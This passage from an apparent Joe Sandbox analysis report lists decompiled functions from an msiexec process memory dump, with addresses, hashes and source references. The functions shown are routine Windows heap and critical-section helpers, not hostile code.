				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04D24620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                              0x04d316e8
                              0x04d316ef
                              0x04d316f3
                              0x04d316fe
                              0x00000000
                              0x04d31700
                              0x04d3170d
                              0x04d3170d
                              0x04d316f2
                              0x04d316f2
                              0x04d316f2
                              0x04d316f2

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d389ef434b80bf77b0992fb72529dc0629e554a05b006bc9ad932c2fc6eec58b
                              • Instruction ID: 567df53c5cf24940856f466340aac40c8c87af1eadddd38ea7dc36dd666e8514
                              • Opcode Fuzzy Hash: d389ef434b80bf77b0992fb72529dc0629e554a05b006bc9ad932c2fc6eec58b
                              • Instruction Fuzzy Hash: 20D0A77220010192FA2D5B119C04B183251EBD078BF38006CF207598C0CFA0FD92E458
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D853CA Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D853CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E04D1EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                              0x04d853ca
                              0x04d853ce
                              0x04d853d9
                              0x04d853de
                              0x04d853e1
                              0x04d853e1
                              0x04d853e6
                              0x04d853f3
                              0x00000000
                              0x04d853f8
                              0x04d853fb

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                              • Instruction ID: 2f54786f9c957dab6c4dbba5611a11e6840f36a541abdae85ef61a8494e8189d
                              • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                              • Instruction Fuzzy Hash: 9BE08C35A00680ABCF12EB48C660F5EB7F5FB44B00F140008A4085B660C624BC00CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D335A1 Relevance: .0, Instructions: 12COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D335A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E04D1EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                              0x04d335a1
                              0x04d335a1
                              0x04d335a5
                              0x04d335ab
                              0x04d335ab
                              0x04d335b5
                              0x00000000
                              0x04d335c1
                              0x04d335b7

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                              • Instruction ID: 4f6f3df77533a1724898d739d13c275408e672378f70d681af51c18b74fce23b
                              • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                              • Instruction Fuzzy Hash: 4AD0C935A51184AAEB51AB50D31CB6877B2FB0031AF5820659C46069A2C3BAAA5AD601
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D1AAB0 Relevance: .0, Instructions: 12COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D1AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                              0x04d1aab6
                              0x04d1aabb
                              0x04d6a442
                              0x00000000
                              0x04d6a448
                              0x04d6a454
                              0x04d6a454
                              0x04d1aac1
                              0x04d1aac1
                              0x04d1aac6
                              0x04d1aac6

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                              • Instruction ID: 4fda14d0b7d831af863b39313c4a748542b92f4de82c49e8fd84caf63db13aeb
                              • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                              • Instruction Fuzzy Hash: 6DD0E935352A80DFD716CF1DD954B1573A4BB45B44FC50490E945CBB65E62CF944CA00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D8A537 Relevance: .0, Instructions: 11COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D8A537(intOrPtr _a4, intOrPtr _a8) {

				return L04D28E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                              0x04d8a553

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                              • Instruction ID: eae730b1045353ae4d71ec3e5e5361e4842900710e0e1f42576e9235b1af8d3b
                              • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                              • Instruction Fuzzy Hash: 53C01232180248BBCB126E81CD00F067B2AEBA4B60F008010FA080A5608632E970EA94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D0DB40 Relevance: .0, Instructions: 11COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D0DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04D24620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                              0x04d0db4d
                              0x04d0db54
                              0x04d0db5f
                              0x04d0db56
                              0x04d0db56
                              0x04d0db5c
                              0x04d0db5c

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                              • Instruction ID: 7d542c2b970f4df0151ad43bf9960eeee4bc0f7cf06178c59d4ae08befd27078
                              • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                              • Instruction Fuzzy Hash: 4FC08C30380A00AAEB225F20CE01B4036A1BB20B0AF4400A0A700DA0F4DB78E901EA10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D0AD30 Relevance: .0, Instructions: 10COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D0AD30(intOrPtr _a4) {

				return L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                              0x04d0ad49

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                              • Instruction ID: c9bd983abb89824d1ed5b3dc3ea7df7825324decc049c65b2f4e412b4f9e2615
                              • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                              • Instruction Fuzzy Hash: C6C08C32180248BBC7226A45CE00F017B29E7A0B60F000020F6040B6618932E860D598
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D336CC Relevance: .0, Instructions: 10COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D336CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                              0x04d336d2
                              0x04d336e8
                              0x04d336d4
                              0x04d336e5
                              0x04d336e5

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                              • Instruction ID: c0e182e8a820bd129bfe928ab1a9fa70a870db40cc595c6b9accda6b8f207163
                              • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                              • Instruction Fuzzy Hash: BFC02B70250440FFE7155F30CF00F147254F700A27F680354B220494F0D528BC00DA00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D176E2 Relevance: .0, Instructions: 10COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D176E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                              0x04d176e4
                              0x00000000
                              0x04d176f8
                              0x04d176fd

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                              • Instruction ID: 1f46d07821fdaecb476c5275d7ad812d62a5e31b6ed85dc8b0c55ea5960ca2a6
                              • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                              • Instruction Fuzzy Hash: 2AC08C702411806AEB2A6B08CE30B203650BB2870CF48019CEE110A4B1C378B842C208
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D23A1C Relevance: .0, Instructions: 10COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D23A1C(intOrPtr _a4) {
				void* _t5;

				return L04D24620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                              0x04d23a35

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                              • Instruction ID: 590ffbd53a641f904d2ace84fffef780f7a15aa668afa61b03ce74bdbf007662
                              • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                              • Instruction Fuzzy Hash: 81C08C32180248BBC712AF41DD00F017B29E7A0B60F000020FA040A5608532ED60D998
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D27D50 Relevance: .0, Instructions: 7COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D27D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                              0x04d27d56
                              0x04d27d5b
                              0x04d27d60
                              0x04d27d5d
                              0x04d27d5d
                              0x04d27d5d

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                              • Instruction ID: 5caba02d81828ff0bf7cdfeba37830d32a052595915d5f39981dd2fc9a7062a9
                              • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                              • Instruction Fuzzy Hash: 59B09234301940CFCF26DF28C180B1533E4BB44A44B8400D0E400CBA20D229E8008900
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D32ACB Relevance: .0, Instructions: 5COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D32ACB() {
				void* _t5;

				return E04D1EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                              0x04d32adc

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                              • Instruction ID: 0f0c40db4b55e3cbdbeb1cc12a26cd2a6e81e82dfc2c9b6f3534935bc3064cca
                              • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                              • Instruction Fuzzy Hash: 78B01232D10450DFCF02EF40D710F197331FB00750F054490980127970C228BC01CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D9FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                              Download Yara Rule
                              C-Code - Quality: 53%
                              			E04D9FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04D4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04D95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04D95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                              0x04d9fdda
                              0x04d9fde2
                              0x04d9fde5
                              0x04d9fdec
                              0x04d9fdfa
                              0x04d9fdff
                              0x04d9fe0a
                              0x04d9fe0f
                              0x04d9fe17
                              0x04d9fe1e
                              0x04d9fe19
                              0x04d9fe19
                              0x04d9fe19
                              0x04d9fe20
                              0x04d9fe21
                              0x04d9fe22
                              0x04d9fe25
                              0x04d9fe40

                              APIs
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D9FDFA
                              Strings
                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D9FE2B
                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D9FE01
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                              • API String ID: 885266447-3903918235
                              • Opcode ID: 36081e09a024ea487337ea1a3efc5c5f00a86867ab1dc643ed392d382d9c9246
                              • Instruction ID: 9d00da377708bd8d7c16b087897eb991dc09193b4945032d391796791cbde19a
                              • Opcode Fuzzy Hash: 36081e09a024ea487337ea1a3efc5c5f00a86867ab1dc643ed392d382d9c9246
                              • Instruction Fuzzy Hash: 88F0F632340201BFEB211A45DC06F23BB9AEB44730F150324F628961D1EA62FD2097F4
                              Uniqueness

                              Uniqueness Score: -1.00%